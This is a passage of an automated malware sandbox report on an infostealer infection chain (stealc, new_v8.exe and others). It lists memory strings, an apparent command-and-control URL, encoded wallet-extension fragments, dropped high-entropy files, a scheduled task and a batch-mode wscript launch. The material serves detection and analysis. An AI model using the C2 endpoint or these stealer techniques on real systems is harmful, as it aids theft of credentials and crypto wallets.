Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: new_v8.exe, 0000001B.00000003.2729694255.00000000039A5000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3098799656.0000000003B44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp, stealc_default2.exe, 00000006.00000003.2475599150.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2731706429.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2730636393.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2729333036.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2895711976.000000000594C000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2935060816.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3098799656.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3094923714.0000000003B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: new_v8.exe, 0000001B.00000003.2729694255.00000000039A5000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3098799656.0000000003B44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17date
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: new_v8.exe, 0000001B.00000003.2753208386.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3586761744.0000000001241000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804141187.0000000003978000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2781723606.0000000003978000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2752826624.0000000003978000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804564424.0000000003978000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/
Source: new_v8.exe, 0000001B.00000003.2732256893.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2732759831.000000000123B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/((
Source: new_v8.exe, 0000001B.00000003.3586627682.0000000001238000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3361161851.0000000001238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/E
Source: new_v8.exe, 0000001B.00000003.2731444217.0000000001234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/EZP
Source: new_v8.exe, 0000001B.00000003.2806388505.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804901138.0000000001234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/H
Source: new_v8.exe, 0000001B.00000003.3361161851.0000000001238000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3013166216.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912344103.0000000001234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/M
Source: new_v8.exe, 0000001B.00000003.3051791237.0000000003986000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804806549.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912107738.0000000001267000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2780168317.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912344103.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3585890980.0000000003986000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3049757259.0000000001267000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912258369.000000000123C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/api
Source: new_v8.exe, 0000001B.00000003.2912258369.000000000123C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apiE
Source: new_v8.exe, 0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apier
Source: new_v8.exe, 0000001B.00000003.3051791237.0000000003986000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apihZP
Source: new_v8.exe, 0000001B.00000003.3051791237.0000000003986000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apik
Source: new_v8.exe, 0000001B.00000003.2754649701.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2785879104.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2780168317.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apilXY
Source: new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/jZP
Source: new_v8.exe, 0000001B.00000003.2780397423.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2754940849.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2780481802.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2753208386.0000000001234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/m
Source: new_v8.exe, 0000001B.00000003.2804141187.0000000003978000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804564424.0000000003978000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/pI
Source: new_v8.exe, 0000001B.00000003.3013166216.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2912344103.0000000001234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/s
Source: new_v8.exe, 0000001B.00000003.2732256893.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2731444217.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2732759831.000000000123B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou:443/api
Source: new_v8.exe, 0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou:443/apiwWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-
Source: new_v8.exe	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2806388505.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804901138.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2879371414.000000000123A000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: new_v8.exe, new_v8.exe, 0000001B.00000003.2806388505.0000000001237000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2804901138.0000000001234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2879371414.000000000123A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&sitei
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3218081015.0000000001655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Jurisdiction.pif.10.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: new_v8.exe, 0000001B.00000003.2734376814.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733596178.00000000039BE000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2733888758.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.2913098718.000000000591F000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2944595083.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2953869224.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.2949495792.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3106922930.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3105886803.0000000003B5D000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3107663794.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: shop.exe, 00000032.00000003.3207526089.0000000003C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: shop.exe, 00000032.00000003.3207526089.0000000003C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 00000006.00000003.2581126375.0000000027DD7000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2785326300.0000000003A8F000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3067850619.0000000005C19000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3099294872.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3207526089.0000000003C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: shop.exe, 00000032.00000003.3207526089.0000000003C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 00000006.00000003.2581126375.0000000027DD7000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2785326300.0000000003A8F000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3067850619.0000000005C19000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3099294872.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3207526089.0000000003C35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: new_v8.exe, 0000001B.00000003.2697182708.0000000001227000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.2713217839.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Code function: 9_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

9_2_004050CD

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Code function: 9_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

9_2_004044A5

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Users\user\AppData\Local\Temp\Molecular entropy: 7.99747464851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Users\user\AppData\Local\Temp\Twisted entropy: 7.99807294997	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Users\user\AppData\Local\Temp\Various entropy: 7.9982397133	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Users\user\AppData\Local\Temp\Fitting entropy: 7.99675888177	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Users\user\AppData\Local\Temp\Spirit entropy: 7.99770041409	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Users\user\AppData\Local\Temp\Sponsorship entropy: 7.99748128877	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Users\user\AppData\Local\Temp\See entropy: 7.99720857135	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Users\user\AppData\Local\Temp\Witch entropy: 7.99656691556	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\T entropy: 7.99966491393	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\O entropy: 7.99966491393	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Suitable entropy: 7.99688273383	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Invalid entropy: 7.99816543384	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Firmware entropy: 7.99826271782	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Hop entropy: 7.99728199081	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Bar entropy: 7.99699428009	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Ruled entropy: 7.99803142953	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Clearance entropy: 7.99663802819	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\January entropy: 7.99693481432	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Denmark entropy: 7.99686693968	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Wisdom entropy: 7.99692465234	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Gay entropy: 7.998406841	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Baby entropy: 7.99787388214	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\July entropy: 7.99793110694	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Johnson entropy: 7.99814673503	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Users\user\AppData\Local\Temp\Continental entropy: 7.99795128412	Jump to dropped file

System Summary

.NET source code contains very large array initializations

Source: 29.2.dac4554719.exe.12831a78.1.raw.unpack, searchX64LPVOIDhierarchy.cs	Large array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832
Source: 29.0.dac4554719.exe.5e408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs	Large array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: random[2].exe.5.dr	Static PE information: section name:
Source: random[2].exe.5.dr	Static PE information: section name: .idata
Source: 1bd0484d71.exe.5.dr	Static PE information: section name:
Source: 1bd0484d71.exe.5.dr	Static PE information: section name: .idata
Source: new_v8[1].exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.5.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.5.dr	Static PE information: section name: .vmp+
Source: random[1].exe0.5.dr	Static PE information: section name:
Source: random[1].exe0.5.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr	Static PE information: section name: .idata
Source: c1a4d3220c.exe.5.dr	Static PE information: section name:
Source: c1a4d3220c.exe.5.dr	Static PE information: section name: .rsrc
Source: c1a4d3220c.exe.5.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: random[1].exe1.5.dr	Static PE information: section name: .rsrc
Source: random[1].exe1.5.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: f6f4816752.exe.5.dr	Static PE information: section name:
Source: f6f4816752.exe.5.dr	Static PE information: section name: .rsrc
Source: f6f4816752.exe.5.dr	Static PE information: section name: .idata
Source: f6f4816752.exe.5.dr	Static PE information: section name:
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: section name:
Source: POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe.27.dr	Static PE information: section name: .idata
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name:
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name: .idata
Source: XLN9V631J4Y45UE4.exe.27.dr	Static PE information: section name:

PE file has a writeable .text section

Source: stealc_default2[1].exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF5F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	6_2_6BF5F280
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFBB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	6_2_6BFBB910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFBB8C0 rand_s,NtQueryVirtualMemory,	6_2_6BFBB8C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFBB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	6_2_6BFBB700
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF7ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	6_2_6BF7ED10

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Code function: 9_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,

9_2_00403883

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\LuggageRepresentations	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\AdditionsSalvation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\SixCream	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\HomelessLaser	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\ActuallyFtp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\EauOfficial	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Windows\SanyoToday
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Windows\DeletedWilliam
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Windows\BookmarkRolling
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	File created: C:\Windows\HimselfConsumption

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF535A0	6_2_6BF535A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFC53C8	6_2_6BFC53C8
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF5F380	6_2_6BF5F380
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF6C370	6_2_6BF6C370
